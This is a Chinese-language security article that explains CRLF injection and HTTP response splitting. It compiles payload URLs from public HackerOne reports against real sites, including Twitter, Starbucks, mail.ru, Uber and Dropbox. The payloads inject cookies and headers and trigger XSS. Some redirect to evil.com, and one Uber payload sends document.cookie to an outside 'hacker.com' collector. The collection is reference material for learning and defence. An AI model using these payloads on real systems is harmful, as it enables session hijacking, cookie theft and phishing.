从 HackerOne 公开报告看 CRLF 注入的各种姿势
整理一下 CRLF 注入的各种姿势。
CRLF 是 Carriage-Return Line-Feed 的缩写,意思是回车换行,即回车(CR, ASCII 13, \r, %0d
) 和换行(LF, ASCII 10, \n, %0a
)。
在 HTTP 报文中,状态行和首部每行以 CRLF 结束,首部与主体之间由一空行分隔。CRLF 注入,即因为 Web 应用没有对用户输入做严格验证,导致攻击者可以通过注入 CRLF 字符实现 HTTP 响应拆分(HTTP Response Splitting)。
也就是说,CRLF 注入的实际效果是,在请求中添加 payload,响应中会出现注入的请求头或值。
CRLF 注入的常见利用场景,是黑客可以通过这种手段制造能注入 Cookie 或特殊请求头的钓鱼链接,从而诱导用户点击实现攻击。很多时候 CRLF 注入可以用来实现 XSS。
HackerOne 搜索 CRLF 披露报告 ...
HackerOne CRLF 披露报告.png整理披露报告的 payload 如下(点击报告编号可打开对应报告):
[1038594] https://www.epay.fas.gsa.gov/%0D%0ASet-Cookie:crlfinjection=crlfinjection
[446271] https://ads.twitter.com/subscriptions/mobile/landing?t=%0d%0aSet-Cookie:%20csrf_id=injection%3b
[191380] https://ton.twitter.com/1.1/ton/data/dm/x/%E5%98%8A%E5%98%8Dset-cookie%3A%20test%3Dtest%3B%20Domain%3D.twitter.com%3B%20Path%3D%2F%3B%20Expires%3DSat%2C%2015-Dec-2018%2009%3A45%3A55%20UTC
[52042] https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test
[192667]
Chrome PoC: http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
FireFox PoC: http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
[237357] https://vpn.bitstrips.com/__session_start__/%0aSet-Cookie:malicious_cookie1
[335599] https://mcs.mail.ru/auth/oidc/login?response_type=code&scope=userinfo&client_id=iaas.mail.ru&state=k1qOT59-VhrTIe177aP0PXOouig&redirect_uri=%0d%0aContent-Length:%200%0d%0a%0d%0a9%0d%0a%0d%0a%3Chtml%3E%3Cmarquee%3E%3Cb%3ETEST%3C/b%3E%3C/marquee%3E%3C/html%3E&nonce=ENHHnrgXnfxv0oBAGRKfaXSQOk5VMyA2MT9KCcZSlCM
[177624] https://team.badoo.com/%0d%0adata:text/html;text,%3Csvg%2fonload%3Dprompt%281%29%3E
[53843] https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=+++++++++++……set-cookie:a
//此漏洞为溢出漏洞,payload 因 + 部分过长有省略,完整 payload 可参看报告
[192749]
Chrome PoC: http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
FireFox PoC: http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
[217058] https://info.hacker.one/%0d%0a%09headername:%20headervalue
[231508] https://vpn.corp.cuvva.com/__session_start__/%0aSet-Cookie:NEW_COOKIE123
[145128] http://account-global.ubnt.com/%3f%0dSet-Cookie:crlf=injection%3bdomain=.ubnt.com%3b
[39181] http://www.vimeopro.com/crlftest%0dSet-Cookie:test=test;domain=.vimeopro.com //适用于 FireFox 以外的任何浏览器
[171473] https://bi.owox.com/%0d%0aMyheader:NewHeader
[234758] https://vpn.mixmax.com/__session_start__/%0aSet-Cookie:malicious_cookie1
[121489] https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28document.domain%29%3E&selectedLanguage=fi&selectedArea=
[183796]
https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28/Xssed_By_G3nt3lman/%29%3E&selectedLanguage=fi&selectedArea=
https://verkkopalvelu.lahitapiola.fi/a6/ajoneuvolaskin/MA/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28/Xssed_By_G3nt3lman/%29%3E&selectedLanguage=fi&selectedArea=
https://verkkopalvelu.lahitapiola.fi/a6/ajoneuvolaskin/MA/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza"'><%0D%0A+%0D%0A+<svg/onload=document.location='http://evil.com'>&selectedLanguage=fi&selectedArea=
https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza"'><%0D%0A+%0D%0A+<svg/onload=document.location='http://evil.com'>&selectedLanguage=fi&selectedArea=
[25275] http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io
[39261] https://monitor.sjc.dropbox.com/crlf%0dSet-Cookie:test=test;domain=.dropbox.com
[181939]
POST /tests/ HTTP/1.1
Host: qpt.mail.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 245
action=answer&test_id=149&qpt_question_url=http%3A%2F%2Fcard.krugdoveriya.mail.ru/%0aSet-Cookie=test=test%3bdomain=.mail.ru%3b&qpt_result_url=http%3A%2F%2Fcard.krugdoveriya.mail.ru%2Ftest.html&question_id=1406&qpt_test_state=1406%3A0&answer=6449
[114198] https://touch.lady.mail.ru/%0aSet-Cookie:csrftoken=x;domain=.mail.ru;
[154306] https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;
[67386]
http://my.mail.ru/crlftest%0dSet-Cookie:crlf=inj6;domain=.mail.ru;path=/;/
http://m.my.mail.ru/crlftest%0dSet-Cookie:crlf=inj4;domain=.mail.ru;path=/;/
https://mir.mail.ru/crlftest%0dSet-Cookie:crlf=inj3;domain=.mail.ru;path=/;/
https://blog.mail.ru/crlftest%0dSet-Cookie:crlf=inj5;domain=.mail.ru;path=/;/
https://blogs.mail.ru/crlftest%0dSet-Cookie:crlf=inj7;domain=.mail.ru;path=/;/
https://www.video.mail.ru/crlftest%0dSet-Cookie:crlf=inj2;domain=.mail.ru;path=/;/
[79552] http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
[99268] https://otus.p.mail.ru/brat/ajax.cgi?action=downloadFile&collection=/&detailed=True&dir=True&extension=xml&filters=content::content_reference::omission::distortion::nonsense::inexact::unclear::content_cohesion::ThemeRheme::logic::content_pragmatics::register::use::&protocol=1&document=%0d%0aCRLF_Vulnerabled:true%00
[154275] http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;
[15492]
http://corp.mail.ru/%0dSet-Cookie:test=test;domain=.mail.ru;
http://corp.mail.ru/%0dSet-Cookie:csrftoken=x;domain=.mail.ru;
[332708] https://dl.beepcar.ru/qwerty%0ASet-Cookie:%20test=qwerty;domain=.beepcar.ru
[66257] https://s.mail.ru/test%0dSet-Cookie:crlf=injection;domain=.mail.ru;
[138332] http://torg.mail.ru//xxx%0ASet-Cookie:test=test;domain=.mail.ru
[36105] http://ishop.qiwi.com/test%0dSet-Cookie:test2=test;domain=.qiwi.com
[66386]
http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com;
https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com;
[140851] https://sales.mail.ru/media/%0ASet-Cookie:test=test?foo
[66391] https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com
[140851] https://sales.mail.ru/media/%0ASet-Cookie:test=test?foo
[125984]
https://developer.uber.com/dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Ealert("Injected js")%3C/script%3E%0d%0a%0d%0a<!- //这里因简书 BUG 删除了一个 - ,本来末尾有两个 -
https://developer.uber.com/dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Evar+img=new+Image();img.src="http://www.hacker.com/incoming.php?coo="%20+%20document.cookie;%3C/script%3E%0d%0a%0d%0a<!- //这里因简书 BUG 删除了一个 - ,本来末尾有两个 -
[13314] https://crowdin.khanacademy.org/page/in-context-localization?email=%0d%0a%20InjectedBy:BigBear
文章首发于 FreeBuf.COM